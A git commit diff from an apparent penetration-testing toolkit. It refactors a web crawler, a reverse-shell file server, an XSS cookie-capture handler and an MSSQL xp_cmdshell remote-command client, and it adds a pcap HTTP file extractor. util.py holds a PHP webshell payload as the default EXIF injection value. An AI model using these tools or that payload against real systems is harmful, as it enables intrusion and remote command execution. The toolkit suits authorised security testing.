Roman Hergenreder 2022-12-09 14:54:06 +01:00
parent 80abe85b85
commit da8dee2143
10 changed files with 410 additions and 30 deletions

@@ -2,7 +2,7 @@ import os
import sys
__doc__ = __doc__ or ""
-__all__ = ["util","fileserver","xss_handler","rev_shell","xp_cmdshell", "dnsserver"]
+__all__ = ["util", "fileserver", "xss_handler", "rev_shell", "xp_cmdshell", "dnsserver"]
inc_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(inc_dir)

@@ -10,6 +10,7 @@ from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Crawler:
    def __init__(self, url):
@@ -36,8 +37,8 @@ class Crawler:
        self.pages = set()

    def request(self, url):
-        headers = { "User-Agent": self.user_agent }
-        kwargs = { "verify": False, "cookies": self.cookies, "headers": headers }
+        headers = {"User-Agent": self.user_agent}
+        kwargs = {"verify": False, "cookies": self.cookies, "headers": headers}
        if self.proxy:
            kwargs["proxies"] = {
                "http": self.proxy,
@@ -67,24 +68,25 @@ class Crawler:
        if parts.netloc and parts.netloc != self.domain:
            self.out_of_scope.add(url)
        else:
-            resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js","svg","ico"]
+            resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js", "svg", "ico"]
            path, args = parts.path, None
            if "?" in path:
-                path = path[0:path.index("?")]
-                args = urllib.parse.parse_args(path[path.index("?")+1:])
+                args = urllib.parse.parse_qs(path[path.index("?") + 1:])
+                path = path[0:path.index("?")]
            if path.rsplit(".", 1)[-1] in resources_ext:
                self.resources.add(url)
            else:
                self.pages.add(url)
-            self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
+            self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme, fragment="").geturl())
-    def collect_urls(self, page):
+    @staticmethod
+    def collect_urls(page):
        if not isinstance(page, BeautifulSoup):
            page = BeautifulSoup(page, "html.parser")
        urls = set()
-        attrs = ["src","href","action"]
-        tags = ["a","link","script","img","form"]
+        attrs = ["src", "href", "action"]
+        tags = ["a", "link", "script", "img", "form"]
        for tag in tags:
            for e in page.find_all(tag):
@@ -98,7 +100,7 @@ class Crawler:
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="The target URI to scan, e.g. http://example.com:8080/dir/")
-    parser.add_argument("--proxy", help="Proxy to connect through") # TODO
+    parser.add_argument("--proxy", help="Proxy to connect through")  # TODO
    parser.add_argument("--user-agent", help="User-Agent to use")
    parser.add_argument("--cookie", help="Cookies to send", action='append', default=[])
    parser.add_argument('--verbose', '-v', help="Verbose output", action='store_true')
@@ -109,7 +111,7 @@ if __name__ == "__main__":
    if args.user_agent:
        crawler.user_agent = args.user_agent
    if args.proxy:
-        crawler.proxy = proxy
+        crawler.proxy = args.proxy
    cookie_pattern = re.compile("^([a-zA-Z0-9.%/+_-]+)=([a-zA-Z0-9.%/+_-]*)$")
    for cookie in crawler.cookies:
@@ -118,7 +120,7 @@ if __name__ == "__main__":
            print("[-] Cookie does not match pattern:", cookie)
            print("[-] You might need to URL-encode it")
            exit()
-        key, value = (urllib.parse.unquoute(m[1]),urllib.parse.unquoute(m[2]))
+        key, value = (urllib.parse.unquote(m[1]), urllib.parse.unquote(m[2]))
        crawler.cookies[key] = value
    crawler.start()

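A minimal sketch of driving the crawler from Python instead of the CLI (assuming crawler.py is importable and that Crawler exposes the attributes touched above: user_agent, proxy, cookies, and start()):

# Hypothetical usage; module and attribute names as shown in the diff above.
from crawler import Crawler

c = Crawler("http://example.com:8080/dir/")
c.user_agent = "Mozilla/5.0"
c.cookies["session"] = "deadbeef"  # sent with every request()
c.start()  # results accumulate in c.pages, c.resources, c.out_of_scope
print(sorted(c.pages))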
@@ -272,7 +272,7 @@ if __name__ == "__main__":
        httpPort = 80
    fileServer = HttpFileServer("0.0.0.0", httpPort)
-    ipAddress = util.getAddress()
+    ipAddress = util.get_address()
    if sys.argv[1] == "shell":
        listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])

pcap-file-extract.py (new file, 321 lines)
@@ -0,0 +1,321 @@
import argparse
import os
import re
from abc import ABC, abstractmethod
from scapy.all import *
from hackingscripts import util


class HttpPacket(ABC):
    def __init__(self, version):
        self.version = version
        self.headers = util.CaseInsensitiveDict()
        self.payload = None

    @staticmethod
    def parse(data):
        index = data.index(b"\r\n")
        first_line = data[0:index+2].decode()
        matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
        matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
        if matches_req:
            http_packet = HttpRequest(*matches_req.groups())
        elif matches_res:
            http_packet = HttpResponse(*matches_res.groups())
        else:
            return None

        header_end = data.index(b"\r\n\r\n")
        header_buffer = data[index+2:header_end+2].decode()
        http_packet.payload = data[header_end+4:]
        for line in re.findall(r"([^:]+):\s?(.*)\r\n", header_buffer):
            http_packet.headers[line[0]] = line[1]
        return http_packet

    @abstractmethod
    def get_file_path(self):
        pass


class HttpRequest(HttpPacket):
    PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"

    def __init__(self, method, uri, version):
        super().__init__(version)
        self.method = method
        self.uri = uri

    def __repr__(self):
        return f"{self.method} {self.uri} HTTP/{self.version}, payload=" + util.human_readable_size(len(self.payload))

    def get_file_path(self):
        return self.uri


class HttpResponse(HttpPacket):
    PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"

    def __init__(self, version, status_code, status_text):
        super().__init__(version)
        self.status_code = int(status_code)
        self.status_text = status_text
        self.response_to = None

    def get_file_path(self):
        content_disposition = self.headers.get("Content-Disposition", None)
        if content_disposition:
            matches = re.findall(r";\s*filename=\"?(.*)\"?(;|$)", content_disposition)
            if matches:
                return matches[0][0]

        if self.response_to:
            return self.response_to.get_file_path()

        return None

    def __repr__(self):
        return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))


class PacketIterator:
    def __init__(self, connection):
        self.connection = connection
        self.index = 0

    def __iter__(self):
        self.index = 0
        return self

    def __next__(self):
        if self.has_more():
            packet = self.connection.packets[self.index]
            self.index += 1
            return packet
        else:
            raise StopIteration

    def peek(self):
        return None if not self.has_more() else self.connection.packets[self.index]

    def pop(self):
        packet = self.peek()
        if packet:
            self.index += 1
        return packet

    def find_packet(self, pattern, sock_src=None):
        for packet in self.connection.packets[self.index:]:
            self.index += 1
            tcp_packet = packet[TCP]
            ip_hdr = packet[IP]
            packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            if sock_src is not None and packet_src != sock_src:
                continue
            payload = bytes(tcp_packet.payload)
            match = re.findall(pattern, payload)
            if match:
                return packet, match[0], packet_src
        return None

    def has_more(self):
        return self.index < len(self.connection.packets)


class TcpConnection:
    def __init__(self, sock_a, sock_b):
        self.sock_a = sock_a
        self.sock_b = sock_b
        self.packets = []
        self._payload_size = 0

    def add_packet(self, packet):
        self.packets.append(packet)
        self._payload_size += len(packet[TCP].payload)

    def get_key(self):
        return TcpConnections._format_key(self.sock_a, self.sock_b)

    def iterator(self):
        return PacketIterator(self)

    def get_other_sock(self, sock):
        return self.sock_a if sock == self.sock_b else self.sock_b

    def __repr__(self):
        return f"{self.get_key()}: {len(self.packets)} packets, {util.human_readable_size(self._payload_size)}"


class TcpConnections:
    def __init__(self):
        self.connections = {}

    def __contains__(self, item: TcpConnection):
        return item.get_key() in self.connections

    def add(self, element: TcpConnection):
        self.connections[element.get_key()] = element

    def __getitem__(self, item: TcpConnection):
        return self.connections[item.get_key()]

    def __iter__(self):
        return iter(self.connections.values())

    @staticmethod
    def _format_key(sock_a, sock_b):
        return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"

    def get_connection(self, sock_a, sock_b):
        key = self._format_key(sock_a, sock_b)
        return self.connections[key]

    def add_packet(self, sock_src, sock_dst, packet):
        key = self._format_key(sock_src, sock_dst)
        if key not in self.connections:
            self.connections[key] = TcpConnection(sock_src, sock_dst)
        self.connections[key].add_packet(packet)
        return self.connections[key]


class PcapExtractor:
    def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
        self.pcap_path = pcap_path
        self.output_dir = output_dir
        self.filters = filters if filters is not None else []
        self._packets = None

    def _open_file(self):
        # self._packets = pcapkit.extract(fin=self.pcap_path, store=False, nofile=True)
        self._packets = rdpcap(self.pcap_path)

    def extract_all(self):
        # TODO: not implemented yet in this commit; list() shows the packets this would write out
        pass

    def _apply_filters(self, packets):
        filtered_packets = packets
        for f in self.filters:
            filtered_packets = filter(f, filtered_packets)
        return list(filtered_packets)

    def list(self):
        self._open_file()
        http_packets = self._parse_http_packets()
        filtered_packets = self._apply_filters(http_packets)
        for packet in filtered_packets:
            print(packet)

    def get_http_packet(self, packet_iterator, sock_src, initial_packet):
        http_buffer = bytes(initial_packet[TCP].payload)
        while packet_iterator.has_more():
            next_packet = packet_iterator.peek()
            if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
                next_packet = packet_iterator.pop()
                http_buffer += bytes(next_packet[TCP].payload)
            else:
                break
        return HttpPacket.parse(http_buffer)

    def _parse_http_packets(self):
        connections = TcpConnections()
        for packet in self._packets:
            if TCP not in packet:
                continue
            ip_hdr = packet[IP]
            tcp_packet = packet[TCP]
            if len(tcp_packet.payload) == 0:
                continue
            sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
            sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
            connections.add_packet(sock_src, sock_dst, packet)

        http_packets = []
        for connection in connections:
            packet_iterator = connection.iterator()
            while packet_iterator.has_more():
                request = packet_iterator.find_packet(HttpRequest.PATTERN)
                if not request:
                    continue
                packet, match, sock_src = request
                method = match[0].decode()
                file_name = match[1].decode().rsplit("?")[0]
                http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_packets.append(http_request_packet)
                other_sock = connection.get_other_sock(sock_src)
                response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
                if not response:
                    continue
                packet, match, sock_src = response
                status_code = match[1].decode()
                http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
                http_response_packet.response_to = http_request_packet
                http_packets.append(http_response_packet)

        return http_packets


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("file", help="Path to pcap file to extract files from")
    parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
                        dest="output_dir")
    parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
    parser.add_argument("-e", "--extract", help="Extract files (default)", default=None, action="store_true")
    parser.add_argument("-ec", "--exclude-codes", help="Exclude HTTP status codes, default: 101,304,403,404",
                        default="101,304,403,404", dest="exclude_codes")
    parser.add_argument("-ic", "--include-codes", help="Limit HTTP status codes", type=str,
                        default="", dest="include_codes")
    parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
                        default="", dest="file_extensions")
    parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
                        default="", dest="file_name")
    parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
                        default="", dest="file_path")
    # TODO: ports, ip_addresses...
    args = parser.parse_args()

    filters = [
        lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
    ]

    if args.include_codes:
        filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])

    if args.file_extensions:
        filters.append(lambda p: os.path.splitext(p.get_file_path() or "")[1].lstrip(".") in args.file_extensions.split(","))

    if args.file_name:
        filters.append(lambda p: os.path.basename(p.get_file_path() or "") == args.file_name)

    if args.file_path:
        filters.append(lambda p: p.get_file_path() == args.file_path)

    pcap_path = args.file
    if not os.path.isfile(pcap_path):
        print("[-] File not found or not a file:", pcap_path)
        exit(1)

    output_dir = args.output_dir
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir, exist_ok=True)
        if not os.path.isdir(output_dir):
            print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
            exit(2)

    pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
    if args.list and args.extract:
        print("[-] Can only specify one of list or extract, not both")
        exit(3)
    elif args.list:
        pcap_extractor.list()
    else:
        pcap_extractor.extract_all()
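Note that extract_all() is still a stub in this commit. A minimal sketch of what it might do with the pieces already in place (the file-name sanitizing and output naming are assumptions, not part of the commit):

# Hypothetical completion of PcapExtractor.extract_all(); reuses the
# _open_file/_parse_http_packets/_apply_filters helpers defined above.
def extract_all(self):
    self._open_file()
    for packet in self._apply_filters(self._parse_http_packets()):
        file_path = packet.get_file_path()
        if not file_path or not packet.payload:
            continue
        # strip the query string and directories so the write stays inside output_dir
        file_name = os.path.basename(file_path.split("?")[0]) or "index.html"
        with open(os.path.join(self.output_dir, file_name), "wb") as f:
            f.write(packet.payload)
        print("[+] Extracted:", file_name)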

@@ -1,7 +1,6 @@
#!/usr/bin/python
import sys
import os
import ipaddress
import subprocess

@@ -12,3 +12,4 @@ pwntools==4.7.0
requests==2.23.0
SocksiPy_branch==1.01
urllib3==1.25.11
+scapy==2.5.0rc2

@@ -12,7 +12,7 @@ if len(sys.argv) < 2:
FILENAME = sys.argv[1]

# Bind the socket to the port or choose a random one
-address = util.getAddress()
+address = util.get_address()
port = None if len(sys.argv) < 3 else int(sys.argv[2])
sock = util.openServer(address, port)
if not sock:

util.py (56 changed lines)
@@ -3,13 +3,11 @@
import random
import socket
import netifaces as ni
import requests
import sys
import exif
import os
import io
from PIL import Image
from bs4 import BeautifulSoup

def isPortInUse(port):
    import socket
@@ -154,6 +152,60 @@ def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, ex
        print("Invalid output argument.")

def human_readable_size(value):
    index = 0
    suffixes = ["B", "KiB", "MiB", "GiB", "TiB"]
    while value >= 1024:
        if index >= len(suffixes) - 1:
            break
        value /= 1024.0
        index += 1
    return "%.2f %s" % (value, suffixes[index])
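For example (a quick sanity check of the helper above):

# >>> human_readable_size(512)
# '512.00 B'
# >>> human_readable_size(123456789)
# '117.74 MiB'  (123456789 / 1024**2 is about 117.74)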
class CaseInsensitiveDict(dict):
    """Basic case-insensitive dict with strings only keys."""
    proxy = {}

    def __init__(self, data=None):
        super().__init__()
        if data:
            self.proxy = dict((k.lower(), k) for k in data)
            for k in data:
                self[k] = data[k]
        else:
            self.proxy = dict()

    def __contains__(self, k):
        return k.lower() in self.proxy

    def __delitem__(self, k):
        key = self.proxy[k.lower()]
        super(CaseInsensitiveDict, self).__delitem__(key)
        del self.proxy[k.lower()]

    def __getitem__(self, k):
        key = self.proxy[k.lower()]
        return super(CaseInsensitiveDict, self).__getitem__(key)

    def get(self, k, default=None):
        return self[k] if k in self else default

    def __setitem__(self, k, v):
        super(CaseInsensitiveDict, self).__setitem__(k, v)
        self.proxy[k.lower()] = k

    @staticmethod
    def build(labels, data):
        row = CaseInsensitiveDict()
        for key, val in zip(labels, data):
            row[key] = val
        return row
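Usage sketch for the dict above (lookups ignore case, while the original key casing is preserved):

# >>> d = util.CaseInsensitiveDict({"Content-Type": "text/html"})
# >>> d["content-type"]
# 'text/html'
# >>> "CONTENT-TYPE" in d
# True
# >>> util.CaseInsensitiveDict.build(["Host", "Port"], ["example.com", 80])["host"]
# 'example.com'

This is how pcap-file-extract.py stores HTTP headers, so the Content-Disposition lookup matches regardless of the casing on the wire.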
if __name__ == "__main__":
    bin = sys.argv[0]
    if len(sys.argv) < 2:

@@ -2,10 +2,11 @@
# interactive xp_cmdshell
# with impacket and cmd
# used https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py for reference
-import os, cmd, sys, re, base64
+import base64
+import cmd
from impacket import tds
import readline
import argparse

class XpShell(cmd.Cmd):
@@ -16,10 +17,12 @@ class XpShell(cmd.Cmd):
        self.file = None
        self.pwsh = False

-    def powershell_encode(self, data):
+    @staticmethod
+    def powershell_encode(data):
        return base64.b64encode(data.encode('UTF-16LE')).decode()

-    def powershell_encode_binary(self, data):
+    @staticmethod
+    def powershell_encode_binary(data):
        return base64.b64encode(data).decode()

    # interpret every line as system command
@@ -57,11 +60,11 @@ exit - i wont say what it does
    def do_upload(self, data, dest):
        writeme = bytearray()  # contains bytes to be written
+        cmd = 'New-Item -Path {} -Force'.format(dest)
+        cmd = self.powershell_encode(cmd)
        try:
            # create/overwrite the target file with powershell
-            cmd = 'New-Item -Path {} -Force'.format(dest)
-            cmd = self.powershell_encode(cmd)
            self.execute_query('powershell -encodedCommand {}'.format(cmd))
        except FileNotFoundError as e:
            print('File not found.')
@@ -141,6 +144,7 @@ exit - i wont say what it does
        except ConnectionResetError as e:
            self.reconnect_mssql()

def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
    # do database connection (simple for now)
    ms_sql = tds.MSSQL(ip, port)
@@ -152,6 +156,7 @@ def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
    else:
        return res

if __name__ == '__main__':
    # pass commands directly into powershell
    # ./xp_cmdshell.py -powershell

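For context, "powershell -encodedCommand" expects base64 over UTF-16LE, which is exactly what powershell_encode produces. A standalone sanity check (standard library only; the sample command is illustrative):

import base64

def powershell_encode(data):
    return base64.b64encode(data.encode('UTF-16LE')).decode()

# "whoami" encodes to "dwBoAG8AYQBtAGkA", i.e. the query sent over xp_cmdshell becomes:
#   powershell -encodedCommand dwBoAG8AYQBtAGkA
print(powershell_encode("whoami"))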
@@ -48,7 +48,7 @@ class XssServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self._set_headers()
        if self.path == "/xss":
-            cookie_addr = getCookieAddress(util.getAddress(), listen_port)
+            cookie_addr = getCookieAddress(util.get_address(), listen_port)
            self.wfile.write(cookie_addr.encode())
        else:
            self.wfile.write(self._html())
@@ -84,7 +84,7 @@ if __name__ == "__main__":
    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
    payload_type = sys.argv[1].lower()
-    local_address = util.getAddress()
+    local_address = util.get_address()
    # choose random port
    if listen_port is None: